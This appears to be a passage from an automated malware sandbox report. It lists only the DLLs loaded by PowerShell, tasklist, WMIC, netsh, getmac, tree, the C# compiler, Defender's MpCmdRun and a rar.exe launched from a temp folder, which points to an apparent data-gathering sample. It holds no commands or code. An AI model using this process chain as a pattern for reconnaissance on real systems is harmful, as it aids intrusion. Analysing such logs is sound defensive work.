              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
